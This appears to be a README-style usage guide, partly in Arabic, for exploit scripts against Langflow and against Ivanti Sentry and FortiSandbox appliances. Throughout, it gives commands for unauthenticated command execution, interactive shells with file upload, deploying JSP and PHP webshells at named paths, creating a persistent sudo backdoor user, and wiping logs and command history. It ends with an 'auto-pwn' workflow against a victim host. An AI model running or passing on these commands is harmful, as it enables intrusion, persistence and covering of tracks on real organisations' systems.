
git clone https://github.com/Layer-6/CVE-2026-5027-Langflow.git
cd CVE-2026-5027-Langflow
python3 exploit.py -u https://target.com
python3 exploit.py -u https://target.com --shell
(📁shells/my-shell.php)
python3 exploit.py -u https://target.com --shell my-shell.php
python3 exploit.py -u https://target.com | -t 58 | |-p payloads.txt | | --upload-paths Dirs.txt |
python3 exploit.py -u https://target.com --shell shells/myshell.php -t 58 -p payloads.txt --upload-paths dirs.txt
· CVE-2026-25089 (CVSS 9.1)
لا تتطلب بيانات اعتماد.
python3 exploitt.py
# Check if vulnerable
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -c "id"
# Interactive shell
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -s
# Deploy JSP webshell (Tomcat)
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -w
# Create backdoor user + clean logs
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -p --clean
# Single command
python3 exploitt.py -u https://forti.example.com --type forti -c "whoami"
# Interactive shell with file upload
python3 exploitt.py -u https://forti.example.com --type forti -s
# Inside shell: upload /path/local.txt /remote/path.txt
# Deploy PHP webshell
python3 exploitt.py -u https://forti.example.com --type forti -w
# Full auto‑pwn (check, shell, webshell, persist, clean)
python3 exploitt.py -u https://forti.example.com --type forti -s -w -p --clean
python3 exploitt.py -u https://target.example.com -c "id"
python3 exploitt.py -u https://target:8443 --proxy http://127.0.0.1:8080 --debug -c "uname -a"
الوسائط المتاحة لسطر الأوامر
الوسيطة الوصف -u, --url عنوان URL للهدف (مثل: https://192.168.1.100:8443) --type فرض الخدمة: ivanti أو forti (اختياري، كشف تلقائي) -t, --timeout مهلة الطلب بالثواني (الافتراضي 30) --proxy بروكسي HTTP/HTTPS (مثل: http://127.0.0.1:8080) -d, --debug تفعيل مخرجات التصحيح --ua سلسلة User-Agent مخصصة -c, --cmd تنفيذ أمر واحد ثم الخروج -s, --shell تشغيل شل تفاعلي -w, --webshell نشر ويب شل (PHP لـ Forti، JSP لـ Ivanti) -p, --persist إنشاء مستخدم خلفي دائم بصلاحيات sudo --clean مسح السجلات وسجل الأوامر بعد الاستغلال
أوامر الشل التفاعلية
داخل الشل التفاعلي يمكنك استخدام:
الأمر المثال الوصف normal command id تنفيذ أي أمر نظام upload upload exploit.sh /tmp/backdoor.sh رفع ملف محلي إلى المضيف البعيد exit exit الخروج من الشل
تفاصيل نشر الويب شل
· Ivanti Sentry – ينشر شل بامتداد .jsp داخل تطبيقات Tomcat (/usr/local/tomcat/webapps/ROOT/) · الوصول عبر https://target/shell_random.jsp?cmd=whoami · FortiSandbox – ينشر شل بامتداد .php داخل جذر الويب (/var/www/html/) · الوصول عبر https://target/shell_random.php?cmd=whoami
مثال لسير العمل (اختبار اختراق كامل)
# 1. Detect and exploit
python3 exploitt.py -u https://victim.com:8443 --type ivanti -s
# 2. Inside the shell, check privileges
id
# 3. Deploy webshell for persistence
python3 exploitt.py -u https://victim.com:8443 --type ivanti -w
# 4. Create a backdoor user
python3 exploitt.py -u https://victim.com:8443 --type ivanti -p
# 5. Clean logs
python3 exploitt.py -u https://victim.com:8443 --type ivanti --clean